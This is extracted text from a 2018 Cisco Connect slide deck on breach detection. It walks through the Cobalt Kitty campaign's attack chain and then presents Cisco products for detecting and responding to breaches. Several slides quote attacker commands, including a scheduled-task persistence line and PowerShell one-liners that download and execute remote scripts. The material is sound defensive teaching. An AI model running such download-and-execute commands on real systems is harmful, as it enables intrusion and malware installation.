Breach Detection and Mitigation Practical Examples

Dragan Novakovic Consulting Systems Engineer

3 Challenges Today

Many discrete security products Information overload High cost of attacker attribution Inefficient breach mitigation process

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 4 Advanced Adversary

• A step below government- sponsored attackers but much more wide spread

• Individuals or organized groups, not governments

• Going after a smaller amount of targets but • Capable of steering higher profits per target infections individually

• Going after $$ - intellectual property, access and user data

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 5 • Sandboxing & Analysis evasion • Misuse of legitimate resources • Low forensic footprint Attack Commonalities • Layers of scripting • Steganography Advanced • Stable C&C

YOU

6 From The Trenches: Cobalt Kitty Campaign

§ Well documented campaign § Revealing latest attack techniques & tactics § Resulted in compromise of domain admin account and sever data breach

Lateral Delivery Exploitation Installation Persistence Movement Exfiltration

Source: https://www2.cybereason.com/asset/60:research-cobalt-kitty-attack-lifecycle

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 7 From The Trenches: Cobalt Kitty Campaign

Spear-phishing Delivery – email containing links to fake Flash update – Users likely to grant admin rights – Downloads and executes Cobalt Strike Beacon (post exploitation tool)

Microsoft Office Word document with macros – Macro creates simple scheduled tasks using cmd.exe – Windows App Locker script blocking policy bypass using .exe (Metasploit: exploit/windows/misc/regsvr32_applocker_bypass_server) – Run PowerShell with rundll32 to bypass software restrictions (https://github.com/p3nt4/PowerShdll)

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 8 From The Trenches: Cobalt Kitty Campaign Scheduled Task Creation Exploitation

schtasks /create /sc MINUTE /tn "" /tr "mshta.exe about:''"/mo 15 /F

Microsoft HTML Application VB Script script execution

Set objShell = CreateObject(“Wscript.Shell”)intReturn = objShell.Run(“ –execute bypass -com”” IEX ((new-object net.webclient).downloadstring (‘hxxp://xx/image.jpg')))

PowerShell script exec. Run CMD command in VB

Cobalt Strike Beacon 19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 9 From The Trenches: Cobalt Kitty Campaign Persistence Persistence Mechanisms – Windows Scheduled Tasks – Windows Services – Autorun keys Google Update loading goopdate.dll

DLL Hijacking – Using legitimate software to execute a trojanized DLL – Abuses DLL not being there by default OR search order in which it is loaded

Windows Search loading msfte.dll

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 10 From The Trenches: Cobalt Kitty Campaign File-less Credentials and Hashed stealing Lat. Movement – Modified version Of Mimikatz (file-less) – Modified version of password file dumper

Lateral Movement – Pass-the-hash and pass-the-ticket attacks – Use of Windows Management Instrumentation (WMI) for remote execution

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 11 From The Trenches: Cobalt Kitty Campaign Lat. Movement File-less Scanning Using PowerUp – Scanning for open ports, vulnerable services and OS fingerprinting using externally hosted Powershell script loaded into memory:

Powershell Invoke Expression

Powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://bit.ly/1mK64oH’); Invoke- AllChecks File-less download PowerUp method

https://blogs.technet.microsoft.com/heyscriptingguy/2014/03/19/creating-a-port-scanner-with-windows-powershell/ https://www.harmj0y.net/blog/powershell/powerup-a-usage-guide/

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 12 From The Trenches: Cobalt Kitty Campaign Exfiltration C&C and Exfiltration using NetCat, DNS Tunelling & Cobalt Strike Malleable C2 Outlook scripts to send exfiltrated data to Gmail address

Sends exfiltrated data via email

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 13 “The art of war teaches us to rely - 1445587 - Warriors China

not on the likelihood - - Old

of the enemy's not - Xian

coming, but on our - Statue own readiness to receive him”

Sun Tzu, The Art of War http://maxpixel.freegreatpicture.com/Museum

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 14 1. Hinder In-Advance Attack Preparation

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 15 1. Hinder In-Advance Attack Preparation üCognitive Treat Analytics – Internal state – Passive – No feeds

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 16 1. Hinder In-Advance Attack Preparation üStealthWatch – Passive – Lat. Movement – Baselining

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 17 2. Deploy Generic C&C Detectors ü Umbrella Investigate – Predictive algorithms – Automatic takedown – Co-occurrences

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 18 2. Deploy Generic C&C Detectors ü Cognitive Threat Analytics – Uncover entire infrastructure – Behavior and context – Including low & slow and steganography- based channels

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 19 2. Deploy Generic C&C Detectors ü Encrypted Traffic Analytics (Stealthwatch) Detects malicious traffic by analyzing: – Initial data packet – hostname – certificate information – supported cipher suites – packet size/timing in TLS-based connections

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 20 3. Stream Endpoint and Network Level Traces Because:

Coding errors Mistakes Detection due to happen happen definition update happen

Do: § Collect and have at hand endpoint and network activity logs

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 21 3. Stream Endpoint and Network Level Traces ü AMP for Endpoints – Collects traces – Retrospection – Root cause analysis – Exploit Prevention – Heuristic Detection

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 22 3. Stream Endpoint and Network Level Traces ü StealthWatch – NetFlow for security

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 23 3. Stream Endpoint and Network Level Traces ü Threat Grid – Global database – Indicators of compromise – Pivoting and context

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 24 4. Use Vendor with Large Threat Research Team ü TALOS

MILLIONS THREAT INTEL INTEL SHARING Of Telemetry Agents

1.5 MILLION 600 BILLION Daily Malware Daily Email Service Provider Customer Data Coordination Samples Messages 250+ Sharing Program Programs Full Time Threat Intel Internet-Wide 16 BILLION Researchers Scanning Daily Web Requests 20 BILLION 500+ Threats Blocked Participants Open 100+ Product Industry Source Threat Intelligence Telemetry Honeypots Sharing Partnershi Intel Partners ps (ISACs) Sharing Vulnerability Discovery Open Source rd (Internal) Communities 3 Party Programs (MAPP) 1100+ Threat Traps 19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 25 4. Use Vendor with Large Threat Research Team

ü TALOS

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 26 4. Use Vendor with Large Threat Research Team

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 27 5. Deploy Full Detector Stack FW/NGFW More detectors NGIPS Antivirus Reputation/Rules Policy/Patches Complex malware Content Filtering Sandboxing Anomaly Bugs, Cost & Risk Increase Machine Learning

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 28 Everything is Configured…Now what?

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 29 Breach Detection and Mitigation - Practically!

Breach Detection Immediate Reaction Final Reaction

Detecting a Following traces Finding additional breach from C&C to a file malicious activity Establishing Estimating on the endpoint priority rating spread on the Analyzing the endpoint and in root cause the network Reimaging the Reviewing related Final Reaction affected

Breach Detection network activity endpoints

Immediate Reaction Updating policies to prevent reinfection

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 30 Breach Detection and Mitigation Process

• CTA detects C2 channel (or Umbrella or Investigate or IoC or Talos)

• TG provides global and local file behavior context (endpoint level details)

• AMP identifies files responsible for C&C activity and provides endpoint visibility

• AMP quarantines malicious executables and blocks their further reintroduction

• ISE quarantines the endpoint

• AMP is used for root cause analysis before endpoint is re-imaged

All steps need to be done within hours to prevent data leaks!

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 31 Notification About a Breach Daily reports in CTA

Too Slow!

Weekly reports in AMP

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 32 Notification About a Breach - Better! § Subscribe to email alerts § Use SIEM for a more granular control

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 33 Establishing Priority Rating AMP and Threat Grid Threat prioritization

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 34 Establishing Priority Rating CTA Threat prioritization

Critical Risk High Risk Medium Risk Low Risk Data damage Bad infection Light infection Network only Quarantine Reimage Try clean Try clean Reimage If failed, reimage If failed, monitor

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 35 Establishing Priority Rating Demo: AMP Event Correlation Step 1: Breach Detection

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 37 Demo: Breach Detection Step 2: Immediate Reaction

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 39 Demo: Immediate Reaction Automatic response with ISE

HTTP(S)

Quarantine Logs

Device STIX/TAXII

ISE CTA Incident

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 41 Block Everywhere - AMP Unity Device Trajectory Customer Specific

Whitelists Blacklists

AMP Cloud

Endpoints Network Appliances Content Appliances

WWW

NGIPS NGFW WSA ESA

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 42 Step 3: Final Reaction

© 2018 Cisco and/or its affiliates. All rights reserved. Cisco Public 43 Demo: Final Reaction Complex Malware Revealed

Malware Powershell Browser Stealing injection privilege extension browser path escalation installation credentials

Would be prevented by ISE quarantine

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 45 Browser Exfiltration Module Revealed

C:/Users/Student1/AppData/Roaming/Mozilla/Firefox/Profiles/…/chrome/content/overlay.js

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 46 Technologies Used

• AMP for Endpoints • Cognitive Threat Analytics • Threat Grid • StealthWatch • AMP Visibility • ISE

19 - 21 March 2018 |Cisco Connect | Rovinj, Croatia 47